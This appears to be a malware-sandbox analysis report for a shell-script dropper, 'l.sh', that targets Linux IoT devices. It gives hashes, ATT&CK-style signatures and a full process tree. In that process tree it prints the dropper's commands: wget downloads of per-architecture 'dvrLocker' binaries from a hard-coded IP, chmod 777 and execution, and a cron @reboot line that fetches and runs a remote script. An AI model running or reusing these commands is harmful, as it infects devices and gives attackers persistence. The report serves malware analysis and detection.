Analysis
-
max time kernel
60s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 08:41
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
l.sh
-
Size
916B
-
MD5
19c4fe1b103747e55af818fc3f07fdbe
-
SHA1
ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
-
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
-
SHA512
2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodshchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 880 chmod 806 sh 815 chmod 819 chmod 859 chmod 888 chmod 892 chmod 900 chmod 908 chmod 804 chmod 832 chmod 855 chmod 916 chmod 920 chmod 924 chmod 896 chmod 912 chmod 848 chmod 872 chmod 876 chmod 904 chmod 864 chmod 868 chmod 884 chmod -
Executes dropped EXE 4 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 805 dvrLocker /tmp/lib/dvrLocker 824 dvrLocker /tmp/lib/dvrLocker 849 dvrLocker /tmp/lib/dvrLocker 860 dvrLocker -
Renames itself 1 IoCs
Processes:
dvrLockerpid process 805 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 80.152.203.134 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.u40wTl crontab -
Changes its process name 1 IoCs
Processes:
dvrLockerdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd 805 dvrLocker -
Processes:
dvrLockerlslslslslslslslslslslslslslslslslslslscrontabcrontablslslslslslslslsdescription ioc process File opened for reading /proc/827/status dvrLocker File opened for reading /proc/829/status dvrLocker File opened for reading /proc/835/status dvrLocker File opened for reading /proc/837/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/849/status dvrLocker File opened for reading /proc/873/status dvrLocker File opened for reading /proc/920/status dvrLocker File opened for reading /proc/924/status dvrLocker File opened for reading /proc/926/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/822/status dvrLocker File opened for reading /proc/856/status dvrLocker File opened for reading /proc/862/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/828/status dvrLocker File opened for reading /proc/860/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/824/status dvrLocker File opened for reading /proc/901/status dvrLocker File opened for reading /proc/891/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/876/status dvrLocker File opened for reading /proc/866/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/854/status dvrLocker File opened for reading /proc/881/status dvrLocker File opened for reading /proc/899/status dvrLocker File opened for reading /proc/927/status dvrLocker File opened for reading /proc/825/status dvrLocker File opened for reading /proc/838/status dvrLocker File opened for reading /proc/908/status dvrLocker File opened for reading /proc/917/status dvrLocker File opened for reading /proc/913/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/819/status dvrLocker File opened for reading /proc/836/status dvrLocker File opened for reading /proc/869/status dvrLocker File opened for reading /proc/883/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/896/status dvrLocker File opened for reading /proc/904/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetrmwgetwgetpid process 902 rm 814 wget 817 rm 867 wget 899 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
l.shdescription ioc process File opened for modification /tmp/lib/dvrLocker l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:708 -
/bin/lsls -l /proc/1/exe2⤵PID:709
-
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:711 -
/bin/lsls -l /proc/105/exe2⤵
- Reads runtime system information
PID:717 -
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:721 -
/bin/lsls -l /proc/113/exe2⤵
- Reads runtime system information
PID:724 -
/bin/lsls -l /proc/114/exe2⤵PID:727
-
/bin/lsls -l /proc/12/exe2⤵PID:731
-
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:734 -
/bin/lsls -l /proc/14/exe2⤵PID:736
-
/bin/lsls -l /proc/143/exe2⤵
- Reads runtime system information
PID:738 -
/bin/lsls -l /proc/147/exe2⤵
- Reads runtime system information
PID:740 -
/bin/lsls -l /proc/15/exe2⤵PID:741
-
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:743 -
/bin/lsls -l /proc/166/exe2⤵PID:746
-
/bin/lsls -l /proc/17/exe2⤵PID:747
-
/bin/lsls -l /proc/18/exe2⤵PID:749
-
/bin/lsls -l /proc/19/exe2⤵PID:750
-
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:751 -
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:752 -
/bin/lsls -l /proc/21/exe2⤵PID:754
-
/bin/lsls -l /proc/22/exe2⤵PID:755
-
/bin/lsls -l /proc/23/exe2⤵PID:756
-
/bin/lsls -l /proc/236/exe2⤵
- Reads runtime system information
PID:757 -
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:758 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:759 -
/bin/lsls -l /proc/327/exe2⤵PID:760
-
/bin/lsls -l /proc/329/exe2⤵PID:761
-
/bin/lsls -l /proc/331/exe2⤵PID:762
-
/bin/lsls -l /proc/335/exe2⤵PID:763
-
/bin/lsls -l /proc/340/exe2⤵
- Reads runtime system information
PID:764 -
/bin/lsls -l /proc/36/exe2⤵PID:765
-
/bin/lsls -l /proc/37/exe2⤵PID:766
-
/bin/lsls -l /proc/379/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/380/exe2⤵PID:768
-
/bin/lsls -l /proc/384/exe2⤵
- Reads runtime system information
PID:769 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:770 -
/bin/lsls -l /proc/425/exe2⤵PID:771
-
/bin/lsls -l /proc/5/exe2⤵PID:772
-
/bin/lsls -l /proc/6/exe2⤵PID:773
-
/bin/lsls -l /proc/670/exe2⤵
- Reads runtime system information
PID:774 -
/bin/lsls -l /proc/673/exe2⤵PID:775
-
/bin/lsls -l /proc/677/exe2⤵PID:776
-
/bin/lsls -l /proc/678/exe2⤵
- Reads runtime system information
PID:777 -
/bin/lsls -l /proc/684/exe2⤵
- Reads runtime system information
PID:778 -
/bin/lsls -l /proc/7/exe2⤵PID:779
-
/bin/lsls -l /proc/70/exe2⤵
- Reads runtime system information
PID:780 -
/bin/lsls -l /proc/700/exe2⤵PID:781
-
/bin/lsls -l /proc/701/exe2⤵PID:782
-
/bin/lsls -l /proc/703/exe2⤵
- Reads runtime system information
PID:783 -
/bin/lsls -l /proc/704/exe2⤵
- Reads runtime system information
PID:784 -
/bin/lsls -l /proc/706/exe2⤵PID:785
-
/bin/lsls -l /proc/707/exe2⤵PID:786
-
/bin/lsls -l /proc/708/exe2⤵PID:787
-
/bin/lsls -l /proc/71/exe2⤵
- Reads runtime system information
PID:788 -
/bin/lsls -l /proc/72/exe2⤵PID:789
-
/bin/lsls -l /proc/73/exe2⤵
- Reads runtime system information
PID:790 -
/bin/lsls -l /proc/74/exe2⤵
- Reads runtime system information
PID:791 -
/bin/lsls -l /proc/75/exe2⤵PID:792
-
/bin/lsls -l /proc/76/exe2⤵PID:793
-
/bin/lsls -l /proc/77/exe2⤵PID:794
-
/bin/lsls -l /proc/78/exe2⤵PID:795
-
/bin/lsls -l /proc/8/exe2⤵PID:796
-
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:797 -
/bin/lsls -l /proc/83/exe2⤵PID:798
-
/bin/lsls -l /proc/9/exe2⤵PID:799
-
/bin/rmrm -rf /tmp/lib/2⤵PID:800
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:801
-
/bin/mkdirmkdir /tmp/lib/2⤵PID:802
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:803
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:804 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:805 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:806 -
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:808 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:809 -
/bin/rmrm -rf mpsl2⤵PID:813
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:814 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:815 -
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:817 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:818
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:819 -
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:822
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:824 -
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:827
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:832 -
/bin/rmrm -rf ppc2⤵PID:840
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:845
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:848 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:849 -
/bin/rmrm -rf arm72⤵PID:850
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:852
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:855 -
/bin/rmrm -rf arm62⤵PID:857
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:858
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:859 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:860 -
/bin/rmrm -rf x862⤵PID:861
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:862
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:863
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:864 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:865
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:867 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:868 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:869
-
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:871
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:872 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:873
-
/bin/rmrm -rf arm2⤵PID:874
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:875
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:876 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:877
-
/bin/rmrm -rf arm52⤵PID:878
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:879
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:880 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:881
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:883
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:884 -
/bin/rmrm -rf arm72⤵PID:886
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:887
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:888 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:889
-
/bin/rmrm -rf arm62⤵PID:890
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:891
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:892 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:893
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:895
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:896 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:897
-
/bin/rmrm -rf mpsl2⤵PID:898
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:899 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:900 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:901
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:902 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:903
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:904 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:905
-
/bin/rmrm -rf arm2⤵PID:906
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:907
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:908 -
/bin/rmrm -rf arm52⤵PID:910
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:911
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:912 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:913
-
/bin/rmrm -rf ppc2⤵PID:914
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:915
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:916 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:917
-
/bin/rmrm -rf arm72⤵PID:918
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:919
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:920 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:921
-
/bin/rmrm -rf arm62⤵PID:922
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:924 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:925
-
/bin/rmrm -rf x862⤵PID:926
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
306B
MD58cd195f9cc1ac87a6d7e9413b64538d9
SHA19e110eaec931ddff0d54fa3372efd7b8c089975c
SHA2568cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68
SHA5122e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652